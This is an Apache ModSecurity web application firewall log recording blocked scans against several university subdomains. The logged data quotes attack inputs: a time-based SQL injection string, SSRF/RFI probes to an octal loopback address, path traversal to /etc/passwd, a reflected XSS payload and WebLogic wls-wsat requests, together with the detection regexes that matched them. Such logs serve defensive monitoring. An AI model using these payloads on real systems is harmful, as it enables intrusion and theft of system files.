[Tue Aug 29 11:35:12.332176 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATOA-IAAAAH"]
[Tue Aug 29 11:35:12.334508 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVJXlcAAAAA"]
[Tue Aug 29 11:35:12.340472 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAT2JSEAAAAz"]
[Tue Aug 29 11:35:12.362521 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATOA-MAAAAH"]
[Tue Aug 29 11:35:12.376115 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAARdiUIAAAAK"]
[Tue Aug 29 11:35:12.398708 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATavwIAAAAg"]
[Tue Aug 29 11:35:12.479791 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATWYTEAAAAa"]
[Tue Aug 29 11:35:12.493698 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUZcHAAAABO"]
[Tue Aug 29 11:35:12.670816 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUZcHAAAABO"]
[Tue Aug 29 11:35:12.723689 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATWYTEAAAAa"]
[Tue Aug 29 11:35:12.777317 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAPLwLIAAAAX"]
[Tue Aug 29 11:35:13.312674 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAATPtTwAAAAM"]
[Tue Aug 29 11:35:13.319772 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAVRxdsAAAAQ"]
[Tue Aug 29 11:35:13.340893 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAUJIz8AAABB"]
[Tue Aug 29 11:35:13.360471 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATUxS0AAAAW"]
[Tue Aug 29 11:35:13.368391 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATWYTMAAAAa"]
[Tue Aug 29 11:35:13.374844 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAATQXjIAAAAO"]
[Tue Aug 29 11:35:13.396497 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAShCbUAAAAi"]
[Tue Aug 29 11:35:14.305274 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAULx9wAAABD"]
[Tue Aug 29 11:35:14.328777 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAPLwLMAAAAX"]
[Tue Aug 29 11:35:14.333680 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAUbg2IAAABQ"]
[Tue Aug 29 11:35:14.334175 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAATWYTUAAAAa"]
[Tue Aug 29 11:35:14.355402 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAATUxTIAAAAW"]
[Tue Aug 29 11:35:14.358103 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAUbg2MAAABQ"]
[Tue Aug 29 11:35:14.361103 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVJXl4AAAAA"]
[Tue Aug 29 11:35:14.365516 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAULx98AAABD"]
[Tue Aug 29 11:35:14.380239 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVJXl8AAAAA"]
[Tue Aug 29 11:35:14.381429 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAARdiUUAAAAK"]
[Tue Aug 29 11:35:15.521518 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11g8Co-f0AAAShCboAAAAi"]
[Tue Aug 29 11:35:15.606235 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11g8Co-f0AAAVvlGUAAAAe"]
[Tue Aug 29 11:35:15.763572 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11g8Co-f0AAAUQ7uAAAABH"]
[Tue Aug 29 11:35:16.189186 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATQXjgAAAAO"]
[Tue Aug 29 11:35:16.207324 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUDQUkAAAA7"]
[Tue Aug 29 11:35:16.214299 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASHh@oAAAAD"]
[Tue Aug 29 11:35:16.271485 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUOaWAAAABG"]
[Tue Aug 29 11:35:16.343971 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAVJXmIAAAAA"]
[Tue Aug 29 11:35:16.344152 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVWQAwAAAAV"]
[Tue Aug 29 11:35:16.345592 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUQ7uEAAABH"]
[Tue Aug 29 11:35:16.350544 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAASI0FoAAAAG"]
